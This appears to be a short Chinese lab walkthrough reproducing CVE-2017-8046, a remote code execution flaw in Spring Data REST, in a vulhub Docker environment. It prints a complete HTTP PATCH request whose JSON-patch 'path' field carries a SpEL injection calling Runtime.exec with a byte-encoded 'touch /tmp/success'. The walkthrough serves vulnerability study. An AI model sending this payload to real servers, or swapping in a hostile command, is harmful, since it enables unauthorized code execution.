当前位置: 首页 > news >正文

Spring Data Rest 远程命令执行命令(CVE-2017-8046)

news 2025/7/15 20:29:29

 (1)访问 http://your-ip:8080/customers/1,然后抓取数据包,使用PATCH请求来修改

PATCH /customers/1 HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 202

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]

返回kali 输入命令进docker入容器 ls /tmp查看 可以发现 成功创建success

http://www.lryc.cn/news/445193.html

相关文章:

  • 计算机前沿技术-人工智能算法-大语言模型-最新论文阅读-2024-09-18
  • 搜索算法:Fibonacci查找
  • 软件验收测试报告有什么作用?第三方验收测试报告包括哪些内容?
  • AI大模型教程 Prompt提示词工程 AI原生应用开发零基础入门到实战【2024超细超全,建议收藏】
  • Pinia的快捷使用方法
  • 一文搞懂C++继承
  • MFC -文件类控件
  • Hbase操作手册
  • vue组件($refs对象,动态组件,插槽,自定义指令)
  • 构建高可用和高防御力的云服务架构第五部分:PolarDB(5/5)
  • QT窗口无法激活弹出问题排查记录
  • node.js 版本管理
  • 使用Python实现图形学曲线和曲面的NURBS算法
  • SpringBoot3
  • 【Text2SQL】领域优质论文分享
  • 2024全国研究生数学建模竞赛(数学建模研赛)ABCDEF题深度建模+全解全析+完整文章
  • Java项目中异常处理的最佳实践
  • CSS基本概念以及CSS的多种引入方式
  • TiDB 简单集群部署拓扑文件
  • 十三 系统架构设计(考点篇)
  • Java-数据结构-二叉树-习题(三)  ̄へ ̄
  • SpringBoot+Aop+注解方式 实现多数据源动态切换
  • 企业如何高效应对多类型知识产权事务的复杂挑战?
  • openeuler22.03 LTS 源码编译安装nginx1.22.1
  • 图片压缩工具免费怎么找?归纳了这几个压缩工具
  • 【Kubernetes知识点】解读HPA的 thrashing(抖动)问题
  • Unity 设计模式 之 结构型模式 -【装饰者模式】【外观模式】【享元模式】【代理模式】
  • Linux上Qt安装相关的内容及在QtCreator使用QChart模块需要的配置
  • lettuce引起的Redis command timeout异常
  • 【Hadoop】一、Hadoop入门:基础配置、集群配置、常用脚本